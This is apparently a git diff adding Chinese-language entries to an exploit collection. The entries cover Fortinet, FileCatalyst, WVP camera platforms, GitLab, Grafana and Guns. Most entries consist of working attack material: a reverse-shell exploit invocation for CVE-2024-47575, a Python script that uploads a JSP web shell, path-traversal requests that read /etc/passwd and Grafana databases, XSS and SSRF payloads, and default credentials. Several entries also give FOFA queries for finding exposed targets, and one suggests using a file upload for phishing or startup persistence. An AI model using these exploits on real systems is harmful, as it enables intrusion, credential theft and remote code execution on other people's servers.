+# print(response)
+
+
+
+request_channel_close = request_channel_close.replace(b"REPLACE_REMOTE_ID", remote_id.encode())
+
+response = sendmsg(ssl_sock, request_channel_close, True)
+# print(response)
+
+
+
+```
+
+首先，建立您的 ncat 会话：
+
+```
+nc -lvvnp 80
+```
+
+然后，执行我们的exp：
+
+```
+python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
+```
+
+要单独检查漏洞，请使用以下选项：
+
+```
+python3 CVE-2024-47575.py --target 192.168.1.110 --action check
+```
+
+## 漏洞来源
+
+- https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
+- https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
\ No newline at end of file
diff --git a/FortigateSSLVPNfgt_lang存在任意文件读取漏洞.md b/FortigateSSLVPNfgt_lang存在任意文件读取漏洞.md
new file mode 100644
index 0000000..b1440c8
--- /dev/null
+++ b/FortigateSSLVPNfgt_lang存在任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# Fortigate SSL VPN fgt_lang存在任意文件读取漏洞
+
+# 一、漏洞简介
+飞塔防火墙设备的专用名词，Fortinet是飞塔的品牌，而FortiGate 是指飞塔硬件。Fortinet的屡获殊荣的FortiGate系列，是采用ASIC加速的UTM解决方案，可以有效地防御网络层和内容层的攻击。Fortinet将其SSL VPN产品线称为Fortigate SSL VPN,主要应用于最终用户以及中型企业。目前互联网上这些服务器的数量已超过48万台,主要集中在亚洲及欧洲区域。FortinetSSL VPN系统存在任意文件读取漏洞，攻击者通过漏洞可以通过VPN进入内网，导致内网失陷。
+
+# 二、影响版本
++ Fortigate SSL VPN
+
+# 三、资产测绘
++ fofa`app="FORTINET-SSLVPN"`
++ 特征
+
+![1708092353453-aa4ebd52-c568-4244-9a91-8c5c81c9e9ec.png](./img/E8qdadyp9jQpN2G8/1708092353453-aa4ebd52-c568-4244-9a91-8c5c81c9e9ec-894218.png)
+
+# 四、漏洞复现
+```java
+GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: keep-alive
+```
+
+![1708092406691-a59dc5bf-81c2-4ef9-8253-ee3897ec4f44.png](./img/E8qdadyp9jQpN2G8/1708092406691-a59dc5bf-81c2-4ef9-8253-ee3897ec4f44-016213.png)
+
+<font style="color:rgb(34, 34, 34);">根据账号密码登录即可</font>
+
+![1708092442244-dbe869e6-9452-46df-a907-52a65b5f547f.png](./img/E8qdadyp9jQpN2G8/1708092442244-dbe869e6-9452-46df-a907-52a65b5f547f-370030.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ewnsxk842voyxx9o>
\ No newline at end of file
diff --git a/FortinetFortiOSmessage存在xss漏洞.md b/FortinetFortiOSmessage存在xss漏洞.md
new file mode 100644
index 0000000..0d61b41
--- /dev/null
+++ b/FortinetFortiOSmessage存在xss漏洞.md
@@ -0,0 +1,25 @@
+# Fortinet FortiOS message存在xss漏洞
+
+# 一、漏洞简介
+Fortinet FortiOS是美国飞塔（Fortinet）公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS 6.0.0版本至6.0.4版本、5.6.0版本至5.6.7版本和5.4及之前版本中的SSL VPN Web门户存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
+
+# 二、影响版本
++ Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.8
+
+# 三、资产测绘
++ fofa`app="FORTINET-SSLVPN"`
++ 特征
+
+![1708092353453-aa4ebd52-c568-4244-9a91-8c5c81c9e9ec.png](./img/0z6DxK_7a53VYND6/1708092353453-aa4ebd52-c568-4244-9a91-8c5c81c9e9ec-153803.png)
+
+# 四、漏洞复现
+```java
+/message?title=x&msg=%26%23<svg/onload=alert("xss")>;
+```
+
+![1708092676710-d70e54d3-4e63-4221-bde2-42a5a8c02563.png](./img/0z6DxK_7a53VYND6/1708092676710-d70e54d3-4e63-4221-bde2-42a5a8c02563-562975.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uvpivrra61yfuuzn>
\ No newline at end of file
diff --git a/Fortra-FileCatalyst-Workflow远程代码执行漏漏洞(CVE-2024-25153).md b/Fortra-FileCatalyst-Workflow远程代码执行漏漏洞(CVE-2024-25153).md
new file mode 100644
index 0000000..c593b53
--- /dev/null
+++ b/Fortra-FileCatalyst-Workflow远程代码执行漏漏洞(CVE-2024-25153).md
@@ -0,0 +1,94 @@
+## Fortra FileCatalyst Workflow远程代码执行漏漏洞(CVE-2024-25153)
+
+
+## poc
+```python
+#!/usr/bin/python3
+"""
+
+Exploit for CVE-2024-25153: Remote Code Execution in Fortra FileCatalyst Workflow 5.x, before 5.1.6 Build 114
+Full details can be found at https://labs.nettitude.com/blog/cve-2024-25153-remote-code-execution-in-fortra-filecatalyst
+
+Usage:  CVE-2024-25153.py --host {hostname} --port {port} --url {url} --cmd {command}
+
+"""
+import requests
+import argparse
+import re
+import uuid
+import urllib.parse
+
+def exploit(host, port, url, cmd, secret):
+    s = requests.Session()
+    try:
+        session_response = s.get(f"{host}:{port}/{url}")
+        
+        # Find session token
+        session_pattern = "\/workflow\/jsp\/logon.jsp;jsessionid=[A-Za-z0-9]+"
+        
+        if(re.search(session_pattern,session_response.text) is None):
+           print("[-] => Error getting session token. Check the -u parameter is correct.")
+           return
+        
+        # Redirect to main login
+        redirect = re.findall(session_pattern, session_response.text)[0]
+        redirect_response = s.get(f"{host}:{port}{redirect}")
+        
+        # Perform anonymous login
+        login_pattern = "\/workflow\/logonAnonymous.do\?FCWEB.FORM.TOKEN=[A-Za-z0-9]+"
+        
+        if(re.search(login_pattern,redirect_response.text) is None):
+           print("[-] => Error logging in. Check anonymous login is enabled.")
+           return
+           
+        login = re.findall(login_pattern, redirect_response.text)[0]
+        
+        login_response = s.get(f"{host}:{port}{login}")
+        
+        # Upload our shell        
+        exploit_url = f"{host}:{port}/{url}/servlet/ftpservlet?wf=octetStream&h=example.com&u=%58%58&p=%58%58&prt=21&c=PUT&sid=CVE-2024-25153/../../CVE-2024-25153/"; # WARNING: Take great care if modifying the upload path (sid parameter). Attempting to upload in the top-level web root will delete the entire application.
+        exploit_headers = {"User-Agent": "CVE-2024-25153", "Content-Type": "application/octet-stream", "X-File-Name": secret + ".jsp"}
+        exploit_data = """<%@ page import=\"java.util.*,java.io.*\"%>
+        <%
+        if (request.getParameter(\"cmd\") != null) {
+           Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));
+           OutputStream os = p.getOutputStream();
+           InputStream in = p.getInputStream();
+           DataInputStream dis = new DataInputStream(in);
+           String disr = dis.readLine();
+           while ( disr != null ) {
+              out.println(disr);
+              disr = dis.readLine();
+           }
+         }
+         %>"""
+        exploit_response = s.post(exploit_url, headers=exploit_headers, data=exploit_data)
+        
+        if("success" not in exploit_response.text):
+           print("[-] => Error uploading file. Target may not be vulnerable.")
+           return
+        
+        # Call the shell
+        cmd_safe = urllib.parse.quote(cmd)
+        cmd_response = s.get(f"{host}:{port}/{url}/CVE-2024-25153/{secret}.jsp?cmd={cmd_safe}")
+        print(cmd_response.text.strip())
+        
+
+    except requests.exceptions.RequestException as e:
+        print(f"[-] => Error occurred for {url}. Target may not be vulnerable.")
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-t","--host", type=str, help="target hostname or IP address (include http:// or https://)", required=True)
+    parser.add_argument("-p","--port", type=int, default=8080, help="target port (Default: 8080)")
+    parser.add_argument("-u","--url", type=str, default="workflow", help="URL where FileCatalyst Workflow is installed (Default: workflow)")
+    parser.add_argument("-c","--cmd", type=str, default="id", help="OS command to run (Default: id)")
+    args = parser.parse_args()
+    
+    exploit(args.host, args.port, args.url, args.cmd, str(uuid.uuid4()))
+```
+
+```
+CVE-2024-25153.py --host <hostname> --port <port> --url <url> --cmd <command>
+```
diff --git a/GB28181摄像头管理平台WVP视频平台存在弱口令漏洞.md b/GB28181摄像头管理平台WVP视频平台存在弱口令漏洞.md
new file mode 100644
index 0000000..5bf8b7f
--- /dev/null
+++ b/GB28181摄像头管理平台WVP视频平台存在弱口令漏洞.md
@@ -0,0 +1,31 @@
+# GB28181摄像头管理平台WVP视频平台存在弱口令漏洞
+
+# 一、产品简介
+ GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式，以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台，GB28181摄像头管理平台在安防领域具有广泛的应用，可以用于监控各种场所，如公共交通、城市道路、企业园区等，提高了监控系统的整体效率和管理水平。WVWVP-GB28181摄像头管理平台存在弱口令，攻击者可利用此漏洞收集敏感信息，从而为下一步攻击做准备。 ![1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb.png](./img/eCwRSGVlFXXKHea5/1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb-624450.png)
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
+ WVP视频平台
+
+# <font style="color:rgb(0, 0, 0);">三、资产测绘</font>
+```plain
+body="国标28181"
+```
+
+![1715269904082-a474df98-5550-4823-95dc-5ce4290ea873.png](./img/eCwRSGVlFXXKHea5/1715269904082-a474df98-5550-4823-95dc-5ce4290ea873-603576.png)
+
+## 四、漏洞复现
+```yaml
+admin/admin
+```
+
+![1716998795402-3c0bda12-379b-4a04-8f59-a89f3af2c220.png](./img/eCwRSGVlFXXKHea5/1716998795402-3c0bda12-379b-4a04-8f59-a89f3af2c220-356426.png)
+
+![1716998843960-7568af22-05cf-4612-86eb-eafb2e220b52.png](./img/eCwRSGVlFXXKHea5/1716998843960-7568af22-05cf-4612-86eb-eafb2e220b52-309982.png)
+
+## 
+
+
+
+
+> 更新: 2024-06-07 14:19:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sbtcussb246zdu62>
\ No newline at end of file
diff --git a/GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞.md b/GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞.md
new file mode 100644
index 0000000..025f5da
--- /dev/null
+++ b/GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞.md
@@ -0,0 +1,28 @@
+# GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞
+
+# 一、产品简介
+ GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式，以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台，GB28181摄像头管理平台在安防领域具有广泛的应用，可以用于监控各种场所，如公共交通、城市道路、企业园区等，提高了监控系统的整体效率和管理水平。GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞,恶意攻击者可以通过此漏洞获取到接口数据![1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb.png](./img/HP4DBBHew-HSYzmD/1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb-309257.png)
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
+ WVP视频平台
+
+# <font style="color:rgb(0, 0, 0);">三、资产测绘</font>
+```plain
+body="国标28181"
+```
+
+![1715269904082-a474df98-5550-4823-95dc-5ce4290ea873.png](./img/HP4DBBHew-HSYzmD/1715269904082-a474df98-5550-4823-95dc-5ce4290ea873-597474.png)
+
+## 四、漏洞复现
+
+
+```yaml
+/doc.html
+```
+
+![1717440534393-b70141ea-46e4-4596-8995-de741648a8c1.png](./img/HP4DBBHew-HSYzmD/1717440534393-b70141ea-46e4-4596-8995-de741648a8c1-266338.png)
+
+
+
+> 更新: 2024-06-07 14:19:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/isuldouw0tqes9et>
\ No newline at end of file
diff --git a/GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞.md b/GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..2f28e40
--- /dev/null
+++ b/GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞.md
@@ -0,0 +1,29 @@
+# GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞
+
+# 一、产品简介
+ GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式，以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台，GB28181摄像头管理平台在安防领域具有广泛的应用，可以用于监控各种场所，如公共交通、城市道路、企业园区等，提高了监控系统的整体效率和管理水平。GB28181摄像头管理平台api接口处存在未授权漏洞,恶意攻击者可以通过此漏洞获取到登录信息，从而登录到后台，使服务器处于不安全的状态  ![1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb.png](./img/vhv8DMGLU3HVem8R/1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb-479686.png)
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
+ WVP视频平台
+
+# <font style="color:rgb(0, 0, 0);">三、资产测绘</font>
+```plain
+body="国标28181"
+```
+
+![1715269904082-a474df98-5550-4823-95dc-5ce4290ea873.png](./img/vhv8DMGLU3HVem8R/1715269904082-a474df98-5550-4823-95dc-5ce4290ea873-791258.png)
+
+## 四、漏洞复现
+```http
+GET /api/user/all HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1715269724994-d04cb343-8099-4450-8a81-ffe1ee1b9ea6.png](./img/vhv8DMGLU3HVem8R/1715269724994-d04cb343-8099-4450-8a81-ffe1ee1b9ea6-323150.png)使用admin/解密后的密码登录系统 ![1715269814518-8be4d2fb-dd7a-4bab-8183-0fda67f3e1ae.png](./img/vhv8DMGLU3HVem8R/1715269814518-8be4d2fb-dd7a-4bab-8183-0fda67f3e1ae-187789.png)
+
+
+
+> 更新: 2024-06-11 10:36:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gqt9d1wy8zy3r8oi>
\ No newline at end of file
diff --git a/GitLabAPI未授权SSRF漏洞(CVE-2021-22214).md b/GitLabAPI未授权SSRF漏洞(CVE-2021-22214).md
new file mode 100644
index 0000000..4f8f12e
--- /dev/null
+++ b/GitLabAPI未授权SSRF漏洞(CVE-2021-22214).md
@@ -0,0 +1,42 @@
+# GitLab API未授权SSRF漏洞(CVE-2021-22214)
+
+# 一、漏洞简介
+GitLab存在前台未授权SSRF漏洞，未授权的攻击者也可以利用该漏洞执行SSRF攻击（CVE-2021-22214）。漏洞源于对用户提供数据的验证不足，远程攻击者可通过发送特殊构造的 HTTP 请求，欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求
+
+# 二、影响版本
+13.10.5 > GitLab >= 10.5
+
+13.11.5 > GitLab >= 13.11
+
+13.12.2 > GitLab >= 13.12
+
+# 三、资产测绘
++ fofa`app="GitLab"`
++ 特征
+
+![1721111619268-5863c992-b306-41aa-bc6b-79164c134ed3.png](./img/YHP79yE5zWVjScmt/1721111619268-5863c992-b306-41aa-bc6b-79164c134ed3-435493.png)
+
+# 四、漏洞复现
+```http
+POST /api/v4/ci/lint HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/json
+Content-Length: 113
+
+
+{"include_merged_yaml": true, "content": "include:\n  remote: http://ynuujrnegu.dgrh3.cn/api/v1/targets?test.yml"}
+```
+
+![1721111645089-c6026c90-8d00-4177-b710-4a3d1abcea1a.png](./img/YHP79yE5zWVjScmt/1721111645089-c6026c90-8d00-4177-b710-4a3d1abcea1a-842840.png)
+
+
+
+> 更新: 2024-09-05 23:24:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/thghq5r9qu36rl0l>
\ No newline at end of file
diff --git a/Grafana存在任意文件读取漏洞.md b/Grafana存在任意文件读取漏洞.md
new file mode 100644
index 0000000..25d05d9
--- /dev/null
+++ b/Grafana存在任意文件读取漏洞.md
@@ -0,0 +1,78 @@
+# Grafana存在任意文件读取漏洞
+
+# 一、漏洞描述
+Grafana是一个开源的可视化和分析平台，一个通用的可视化工具。‘通用’意味着Grafana不仅仅适用于展示Prometheus下的监控数据，也同样适用于一些其他的数据可视化需求。Grafana存在任意文件读取漏洞
+
+# 二、影响版本
+Grafana
+
+# 三、资产测绘
+```plain
+app="Grafana"
+```
+
+![1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a.png](./img/8Nx1Nu4Ynx9J9B-F/1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a-677927.png)
+
+# 三、漏洞复现
+```plain
+GET /public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: 
+Content-Length: 2
+```
+
+![1727017201650-ed9abda9-2b7f-4967-8f25-f7ed73941133.png](./img/8Nx1Nu4Ynx9J9B-F/1727017201650-ed9abda9-2b7f-4967-8f25-f7ed73941133-616038.png)
+
+读取配置文件
+
+```plain
+GET /public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini HTTP/1.1
+Host: 
+Content-Length: 2
+```
+
+数据库
+
+```plain
+GET /public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1
+Host: 
+Content-Length: 2
+```
+
+其他读取路径
+
+```plain
+/public/plugins/alertGroups/../../../../../../../../etc/passwd
+/public/plugins/alertlist/../../../../../../../../etc/passwd
+/public/plugins/annolist/../../../../../../../../etc/passwd
+/public/plugins/barchart/../../../../../../../../etc/passwd
+/public/plugins/bargauge/../../../../../../../../etc/passwd
+/public/plugins/canvas/../../../../../../../../etc/passwd
+/public/plugins/dashlist/../../../../../../../../etc/passwd
+/public/plugins/debug/../../../../../../../../etc/passwd
+/public/plugins/gauge/../../../../../../../../etc/passwd
+/public/plugins/geomap/../../../../../../../../etc/passwd
+/public/plugins/gettingstarted/../../../../../../../../etc/passwd
+/public/plugins/graph/../../../../../../../../etc/passwd
+/public/plugins/heatmap/../../../../../../../../etc/passwd
+/public/plugins/histogram/../../../../../../../../etc/passwd
+/public/plugins/live/../../../../../../../../etc/passwd
+/public/plugins/logs/../../../../../../../../etc/passwd
+/public/plugins/news/../../../../../../../../etc/passwd
+/public/plugins/nodeGraph/../../../../../../../../etc/passwd
+/public/plugins/piechart/../../../../../../../../etc/passwd
+/public/plugins/pluginlist/../../../../../../../../etc/passwd
+/public/plugins/stat/../../../../../../../../etc/passwd
+/public/plugins/state-timeline/../../../../../../../../etc/passwd
+/public/plugins/status-history/../../../../../../../../etc/passwd
+/public/plugins/table/../../../../../../../../etc/passwd
+/public/plugins/table-old/../../../../../../../../etc/passwd
+/public/plugins/text/../../../../../../../../etc/passwd
+/public/plugins/timeseries/../../../../../../../../etc/passwd
+/public/plugins/welcome/../../../../../../../../etc/passwd
+/public/plugins/xychart/../../../../../../../../etc/passwd
+```
+
+
+
+> 更新: 2024-10-22 09:41:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qkw3xd9rwpw26kmc>
\ No newline at end of file
diff --git a/Grafana存在未授权访问漏洞.md b/Grafana存在未授权访问漏洞.md
new file mode 100644
index 0000000..79c870c
--- /dev/null
+++ b/Grafana存在未授权访问漏洞.md
@@ -0,0 +1,30 @@
+# Grafana存在未授权访问漏洞
+
+# 一、漏洞描述
+Grafana是一个开源的可视化和分析平台，一个通用的可视化工具。‘通用’意味着Grafana不仅仅适用于展示Prometheus下的监控数据，也同样适用于一些其他的数据可视化需求。Grafana存在未授权访问漏洞，未经身份验证的用户可以绕过前端安全认证，未授权访问通过登录页面访问系统仪表板区域。
+
+# 二、影响版本
+Grafana
+
+# 三、资产测绘
+```plain
+app="Grafana"
+```
+
+![1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a.png](./img/Jh4jQ6Q82EoPxhu7/1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a-024790.png)
+
+# 三、漏洞复现
+```plain
+/?orgId=1
+```
+
+![1727013899091-bb094584-ee26-41f8-b445-b706c96dd975.png](./img/Jh4jQ6Q82EoPxhu7/1727013899091-bb094584-ee26-41f8-b445-b706c96dd975-586462.png)
+
+```plain
+/metrics
+```
+
+
+
+> 更新: 2024-10-22 09:41:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iwh76cslo7q2l2wy>
\ No newline at end of file
diff --git a/Grafana存在默认口令漏洞.md b/Grafana存在默认口令漏洞.md
new file mode 100644
index 0000000..d5350a3
--- /dev/null
+++ b/Grafana存在默认口令漏洞.md
@@ -0,0 +1,26 @@
+# Grafana存在默认口令漏洞
+
+# 一、漏洞描述
+Grafana是一个开源的可视化和分析平台，一个通用的可视化工具。‘通用’意味着Grafana不仅仅适用于展示Prometheus下的监控数据，也同样适用于一些其他的数据可视化需求。Grafana存在默认口令漏洞
+
+# 二、影响版本
+Grafana
+
+# 三、资产测绘
+```plain
+app="Grafana"
+```
+
+![1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a.png](./img/ZUN4kTuU7qSHRsVR/1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a-807739.png)
+
+# 三、漏洞复现
+```plain
+admin/admin
+```
+
+![1727014051613-fb02a5a8-057a-4396-aae0-61c173146bff.png](./img/ZUN4kTuU7qSHRsVR/1727014051613-fb02a5a8-057a-4396-aae0-61c173146bff-333768.png)
+
+
+
+> 更新: 2024-10-22 09:41:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/frrsz6mukggncnm8>
\ No newline at end of file
diff --git a/Grafana表达式远程代码执行(CVE-2024-9264).md b/Grafana表达式远程代码执行(CVE-2024-9264).md
new file mode 100644
index 0000000..56962fc
--- /dev/null
+++ b/Grafana表达式远程代码执行(CVE-2024-9264).md
@@ -0,0 +1,157 @@
+# Grafana表达式远程代码执行(CVE-2024-9264)
+
+Grafana 的 SQL 表达式实验功能允许评估包含用户输入的“duckdb”查询。这些查询在传递给“duckdb”之前没有得到充分的净化，从而导致命令注入和本地文件包含漏洞。任何具有 VIEWER 或更高权限的用户都能够执行此攻击。 “duckdb”二进制文件必须存在于 Grafana 的 $PATH 中才能使此攻击起作用；默认情况下，此二进制文件未安装在 Grafana 发行版中。
+
+## 影响版本
+
+Grafana >= v11.0.0 (all v11.x.y are impacted)
+
+## poc
+
+```javascript
+POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q100 HTTP/1.1
+Host: 127.0.0.1:3000
+Content-Type: application/json
+Cookie: grafana_session=a739fa9aeb235f2790f17de00fefe528
+Content-Length: 368
+
+{
+  "from": "1696154400000",
+  "to": "1696345200000",
+  "queries": [
+    {
+      "datasource": {
+        "name": "Expression",
+        "type": "__expr__",
+        "uid": "__expr__"
+      },
+      "expression": "SELECT * FROM read_csv_auto('/etc/passwd');",
+      "hide": false,
+      "refId": "B",
+      "type": "sql",
+      "window": ""
+    }
+  ]
+}
+
+```
+
+![image-20241022092542872](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410220925944.png)
+
+## python
+
+```python
+#!/usr/bin/env python3
+
+"""
+Grafana File Read PoC (CVE-2024-9264)
+Author: z3k0sec // www.zekosec.com
+"""
+
+
+import requests
+import json
+import sys
+import argparse
+
+class Console:
+    def log(self, msg):
+        print(msg, file=sys.stderr)
+
+console = Console()
+
+def msg_success(msg):
+    console.log(f"[SUCCESS] {msg}")
+
+def msg_failure(msg):
+    console.log(f"[FAILURE] {msg}")
+
+def failure(msg):
+    msg_failure(msg)
+    sys.exit(1)
+
+def authenticate(s, url, u, p):
+    res = s.post(f"{url}/login", json={"password": p, "user": u})
+    if res.json().get("message") == "Logged in":
+        msg_success(f"Logged in as {u}:{p}")
+    else:
+        failure(f"Failed to log in as {u}:{p}")
+
+def run_query(s, url, query):
+    query_url = f"{url}/api/ds/query?ds_type=__expr__&expression=true&requestId=1"
+    query_payload = {
+        "from": "1696154400000",
+        "to": "1696345200000",
+        "queries": [
+            {
+                "datasource": {
+                    "name": "Expression",
+                    "type": "__expr__",
+                    "uid": "__expr__"
+                },
+                "expression": query,
+                "hide": False,
+                "refId": "B",
+                "type": "sql",
+                "window": ""
+            }
+        ]
+    }
+
+    res = s.post(query_url, json=query_payload)
+    data = res.json()
+
+    # Handle unexpected response
+    if "message" in data:
+        msg_failure("Unexpected response:")
+        msg_failure(json.dumps(data, indent=4))
+        return None
+
+    # Extract results
+    frames = data.get("results", {}).get("B", {}).get("frames", [])
+
+    if frames:
+        values = [
+            row
+            for frame in frames
+            for row in frame["data"]["values"]
+        ]
+        
+        if values:
+            msg_success("Successfully ran DuckDB query:")
+            return values
+
+    failure("No valid results found.")
+
+def decode_output(values):
+    return [":".join(str(i) for i in row if i is not None) for row in values]
+
+def main(url, user="admin", password="admin", file=None):
+    s = requests.Session()
+    authenticate(s, url, user, password)
+    file = file or "/etc/passwd"
+    escaped_filename = requests.utils.quote(file)
+    query = f"SELECT * FROM read_csv_auto('{escaped_filename}');"
+    content = run_query(s, url, query)
+    if content:
+        msg_success(f"Retrieved file {file}:")
+        for line in decode_output(content):
+            print(line)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Arbitrary File Read in Grafana via SQL Expression (CVE-2024-9264).")
+    parser.add_argument("--url", help="URL of the Grafana instance to exploit")
+    parser.add_argument("--user", default="admin", help="Username to log in as, defaults to 'admin'")
+    parser.add_argument("--password", default="admin", help="Password used to log in, defaults to 'admin'")
+    parser.add_argument("--file", help="File to read on the server, defaults to '/etc/passwd'")
+
+
+    args = parser.parse_args()
+    main(args.url, args.user, args.password, args.file)
+
+```
+
+## 漏洞来源
+
+- https://zekosec.com/blog/file-read-grafana-cve-2024-9264/
+- https://github.com/z3k0sec/File-Read-CVE-2024-9264
diff --git a/Guns后台任意文件上传漏洞.md b/Guns后台任意文件上传漏洞.md
new file mode 100644
index 0000000..6aca557
--- /dev/null
+++ b/Guns后台任意文件上传漏洞.md
@@ -0,0 +1,48 @@
+# Guns后台任意文件上传漏洞
+
+Guns后台任意文件上传漏洞
+
+## poc
+
+```javascript
+POST /api/sysFileInfo/upload HTTP/1.1
+Host: 192.168.91.130:9000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: application/json, text/plain, */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.91.1:9000/system/structure/user
+Authorization: eyJhbGciOiJIUzUxMiJ9.eyJ1c2VySWQiOjEzMzk1NTA0Njc5Mzk2MzkyOTksImFjY291bnQiOiJhZG1pbiIsInV1aWQiOiI1NmQzZjczNy1hNjU1LTRjYzgtODRkNi0xNDdjYTE1M2Y5OGIiLCJyZW1lbWJlck1lIjpmYWxzZSwiZXhwaXJhdGlvbkRhdGUiOjE3MzUxMDM0MDM0ODgsImNhVG9rZW4iOm51bGwsIm90aGVycyI6bnVsbCwic3ViIjoiMTMzOTU1MDQ2NzkzOTYzOTI5OSIsImlhdCI6MTczNDQ5ODYwMywiZXhwIjoxNzM1MTAzNDAzfQ.Ur3bUwltSXWUtIT1OOR4MV4frJeRy_MDEkmYg99F5L2DOx6C4ha_y476dTWMy7gAJZsq5x_2C_VEkWxWv7uHXw
+Content-Type: multipart/form-data; boundary=---------------------------4047569836919132683218702
+Content-Length: 510
+Origin: http://192.168.91.130:9000
+Connection: close
+
+-----------------------------4047569836919132683218702
+Content-Disposition: form-data; name="file"; filename=".exe"
+Content-Type: image/png
+
+1111
+-----------------------------4047569836919132683218702
+Content-Disposition: form-data; name="secretFlag"
+
+N
+-----------------------------4047569836919132683218702
+Content-Disposition: form-data; name="fileBucket"
+
+../../../../../../../../../../../../../../../../../../看到请点击exe备份
+-----------------------------4047569836919132683218702--
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412300945840.png)
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412300946118.png)
+
+可以用在钓鱼，如果项目在c盘，可以放到启动项中，
+这里可以看到是在哪个盘
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412300946901.png)
+
+## 漏洞来源
+
+- https://xz.aliyun.com/t/16808?time__1311=Gui%3DGIfDODkD%2FD0lD2DUxQw860LQcrpD#toc-0
\ No newline at end of file
diff --git a/H2dbconsole未授权访问.md b/H2dbconsole未授权访问.md
new file mode 100644
index 0000000..1e064bc
--- /dev/null
+++ b/H2dbconsole未授权访问.md
@@ -0,0 +1,34 @@
